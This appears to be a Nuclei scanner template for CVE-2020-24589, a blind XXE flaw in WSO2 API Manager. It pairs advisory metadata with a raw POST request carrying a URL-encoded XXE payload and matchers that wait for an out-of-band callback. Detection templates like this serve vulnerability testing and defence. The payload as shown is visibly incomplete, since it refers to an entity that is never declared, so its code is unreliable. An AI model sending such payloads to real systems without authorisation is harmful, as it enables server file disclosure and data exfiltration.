id: CVE-2020-24589 info: name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection author: lethargynavigator severity: critical description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. remediation: | Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2020-24589 cwe-id: CWE-611 epss-score: 0.55133 epss-percentile: 0.97313 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager tags: cve,cve2020,wso2,xxe,oast,blind http: - raw: - | POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body words: - "Failed to install the generic artifact type" # digest: 490a00463044022040323c08a6e846c208a0622781f33c9894cade174931ee89690d35fca6fae1d802202e8eabb83778b40e18238c415f479df0fc01f5a21c1d850d8c336e459cef8413:922c64590222798bb761d5b6d8e72950